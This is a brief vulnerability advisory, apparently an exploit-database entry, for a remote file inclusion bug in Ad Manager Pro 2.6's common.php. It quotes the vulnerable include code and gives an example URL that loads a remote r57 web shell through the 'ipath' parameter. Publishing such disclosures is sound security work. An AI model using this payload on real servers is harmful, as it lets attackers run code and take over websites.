Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion

Ad Manager Pro 2.6 Remote File Include Vulnerability homepage: phpwebscripts.com Affected files: ad.php and common.php Credit: Basti Vulnerable Code: if $ipath include$ipath.'/common.php'; else include'./common.php'; Example: http://site/admanagerpro/common.php?ipath=http://site/r57.txt?...